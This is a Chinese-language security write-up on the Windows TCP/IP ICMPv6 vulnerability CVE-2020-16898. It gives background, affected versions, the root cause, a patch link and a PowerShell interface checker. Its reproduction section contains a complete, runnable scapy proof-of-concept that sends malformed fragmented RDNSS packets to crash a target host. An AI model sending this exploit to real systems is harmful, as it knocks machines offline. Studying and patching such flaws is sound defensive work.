0x00 漏洞背景
2020年10月14日,某监测发现 Microsoft 发布了 TCP/IP远程代码执行漏洞的风险通告,该漏洞是由于Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement(路由通告)数据包时存在漏洞,远程攻击者通过构造特制的ICMPv6 Router Advertisement(路由通告)数据包 ,并将其发送到远程Windows主机上,可造成远程BSOD,漏洞编号为CVE-2020-16898。
0x01 影响版本
操作系统 | 版本 | 版本补丁 | 经过测试 |
---|---|---|---|
Windows 10 | X86 / x64 / ARM64 | 1709 | ✔️ |
Windows 10 | X86 / x64 / ARM64 | 1803 | ✔️ |
Windows 10 | X86 / x64 / ARM64 | 1809年 | ✔️ |
Windows 10 | X86 / x64 / ARM64 | 1903年 | ✔️ |
Windows 10 | X86 / x64 / ARM64 | 1909年 | ✔️ |
Windows 10 | X86 / x64 / ARM64 | 2004年 | ✔️ |
Windows Server 2019 | |||
Windows Server 2019(服务器核心版) | |||
Windows Server 1903版(服务器核心版) | |||
Windows Server版本1909(服务器核心版) | |||
Windows Server 2004版(服务器核心版本) |
0x02 漏洞成因
根据rfc5006 描述,RDNSS包的length应为奇数,而当攻击者构造的RDNSS包的Length为偶数时,Windows TCP/IP 在检查包过程中会根据Length来获取每个包的偏移,遍历解析,导致对 Addresses of IPv6 Recursive DNS Servers 和下一个 RDNSS 选项的边界解析错误,从而绕过验证,将攻击者伪造的option包进行解析,造成栈溢出,从而导致系统崩溃。
0x03 漏洞复现
攻击机:win10x64
靶机:Windows 10x64_1709
1.通过vmware对受害主机开启IPV6
#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6
v6_dst = "fd15:4ba5:5a2b:1008:9d37:36d2:3363:6496" #目标靶机IPv6 地址
v6_src = "fe80::ec1e:a7aa:6717:67c6%13" #攻击机本地链接 IPv6 地址
p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4
c = ICMPv6NDOptEFA()
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
aaa = ICMPv6NDOptRDNSS()
aaa.len = 8
pkt = ICMPv6ND_RA() / aaa / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt
l=fragment6(p_test_frag, 200)
for p in l:
send(p)
4.本地检查脚本:CVE-2020-16898_Checker.ps1
#######################################################################################################
### 14/10/2020 - Written by Cyril Pineiro / SYNAPSYS-IT
### Check if Network Interface is Vulnerable to CVE-2020-16898 & CVE-2020-16899
### Returns Interface Index and Alias
#######################################################################################################
Clear
$interfaces = (Get-NetIPInterface | where {$_.AddressFamily -eq "IPv6"}).ifIndex
foreach ($interface in $interfaces)
{
[bool]$vuln = $false
$output = netsh int ipv6 sh interfaces interface=$interface
foreach ($Line in $output)
{
if($Line.Contains("6106") -and $Line.Contains("enabled"))
{
[bool]$vuln = $true
}
}
$NetIPInterfaceAlias = ((Get-NetIPAddress -InterfaceIndex $interface | Select-Object InterfaceAlias)[0]).InterfaceAlias
if ($vuln)
{
Write-Host "Interface '$($interface)' named '$($NetIPInterfaceAlias)' is Vulnerable to CVE-2020-16898 & CVE-2020-16899" -ForegroundColor Red
}
else
{
Write-Host "Interface '$($interface)' named '$($NetIPInterfaceAlias)' is Not Vulnerable to CVE-2020-16898 & CVE-2020-16899" -ForegroundColor Green
}
}
0x04 漏洞修复
通过如下链接自行寻找符合操作系统版本的漏洞补丁,并进行补丁下载安装
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898